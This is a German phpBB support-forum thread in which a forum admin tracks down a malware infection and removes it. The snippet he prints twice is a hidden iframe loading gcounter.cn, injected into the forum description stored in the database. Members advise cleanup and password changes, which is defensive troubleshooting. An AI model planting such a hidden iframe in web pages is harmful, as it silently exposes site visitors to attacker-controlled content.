Firefox / Safari sperrt User aus (iFrame Problem)

Fragen zur Bedienung von phpBB 3.0.x, Probleme bei der Benutzung und alle weiteren Fragen inkl. Update auf die neuste phpBB 3.0.14 Version
Forumsregeln
phpBB 3.0 hat das Ende seiner Lebenszeit überschritten
phpBB 3.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 3.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf die neuste phpBB-Version, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
Schwarzbueb
Mitglied
Re: Firefox / Safari sperrt User aus (iFrame Problem)

Beitrag von Schwarzbueb »

Beginne soeben mit dem Download des ganzen phpBB3 Ordners und schau dann mal nach ob ich was mit der Textsuche finde.
Schwarzbueb
Mitglied

Kein Erfolg mit der Suche
DeepSurfer
Mitglied

Beitrag von DeepSurfer »

Ich würde jetzt was ausprobieren indem ich den domain/phpBB3 Pfad einfach mal umbenennen "phpbb3" in "forum".

Dann manuell http://www.fischerforum.ch/forum/portal.php aufrufen.
Musst Du wissen ob Du das auch mal testen willst.
wie einst der MCP aus Tron auf dem Bildschirm zu schreiben pflegte.
- end of communication -
greets
Schwarzbueb
Mitglied

Ich habe heute Nacht bei Google Webmaster Tools eine erneute Malware Überprüfung beantragt, da ich nix gefunden habe und siehe da, wie aus dem nichts ..... Es wurde keine Malware gefunden.

Eine Erklärung für das ganze habe ich nicht, ausser das der Hoster evtl. Wind davon bekommen hat und es evtl. behoben hat *keinahnung*.

Ich konnte es aber an meinem Arbeitsplatz nicht mit Mozilla etc. testen, da ich nichts installieren kann, aber bin zuversichtlich das es klappen wird.

Ansonsten melde ich mich hier nochmal.
DeepSurfer
Mitglied

Beitrag von DeepSurfer »

ISt erreichbar mit FireFox 3.6.6
- end of communication -
greets
Schwarzbueb
Mitglied

Google Chrome zickt noch rum, da habe ich erneut in den Webmastertools von Google nachgesehen .....
Google spuckt schon wieder zwei neuen Meldungen von heute aus, diesesmal ist der Link alleine ohne Script im Quelltext aufgetaucht:

http://www.fischerforum.ch/phpBB3/viewt ... 123&t=8905

Irgendwie getarnt mit der Beschreibung des Forums f=123

Code: Alles auswählen

<!-- NOTE: remove the style="display: none" when you want to have the forum description on the topic body --><div style="display: none !important;">Alles über Köder für die Bergsee- und Eisfischerei<iframe src=http://gcounter.cn style=display:none></iframe><br /></div>
http://www.fischerforum.ch/phpBB3/viewt ... 123&t=9228

Auch hier getarnt als Forenbeschreibung f=123

<!-- NOTE: remove the style="display: none" when you want to have the forum description on the topic body --><div style="display: none !important;">Alles über Köder für die Bergsee- und Eisfischerei<iframe src=http://gcounter.cn style=display:none></iframe><br /></div>
Verdächtiger injizierter Code

<iframe src=http://gcounter.cn style=display:none>
Keine Ahnung woher das stammt, die über 50 Meldungen von gestern wurden in Google gecleart und heute findet er wieder 2 neue, aber ohne Script, sondern nur mit dem versteckten Link.

Ich bin Planlos
Schwarzbueb
Mitglied

Konnte soeben den Code in der Datenbank phpbb_forums/forum_desc rauslöschen, aber ich zweifle daran, das dies schon alles war.
Die Löschung war nur über phpmyadmin möglich und nicht über das ACP des Boards, also direkt in der Datenbank.

Wie kann ich die ganze Datenbank auf den Begriff "gcounter" durchsuchen?

Edit: Habe die ganze Datenbank nach %gcounter% untersuchen können, es war nur das was ich oben bereits aus der Forenbeschreibung rausgelöscht habe. Sonst fand er nur reinen Text in unserer Kommunikation wie in PN's oder Beiträgen.

Mal sehen ob es das war, auf jeden Fall habe ich mal meine Passwörter für den FTP geändert.
Zuletzt geändert von Schwarzbueb am 08.07.2010 06:15, insgesamt 1-mal geändert.
DeepSurfer
Mitglied

Beitrag von DeepSurfer »

mal alles was an Passwörter für den Webspace zu tun hat, neue anfertigen, damit meine ich nicht nur das FTP und oder SSH Passwort sondern auch Passwörter für den Kundebereich beim Hoster.
- end of communication -
greets
Schwarzbueb
Mitglied

Habe mal alles geändert und falls noch mehr kommen sollte werde ich den Zugriff der Datenbank auch noch ändern, wir werden morgen sehen.
Schwarzbueb
Mitglied

Bis jetzt keine neue Meldungen von Google wegen Malware und Chrome funzt auch wieder, mal sehen wie es am Abend aussieht.
Antworten

Zurück zu „[3.0.x] Administration, Benutzung und Betrieb“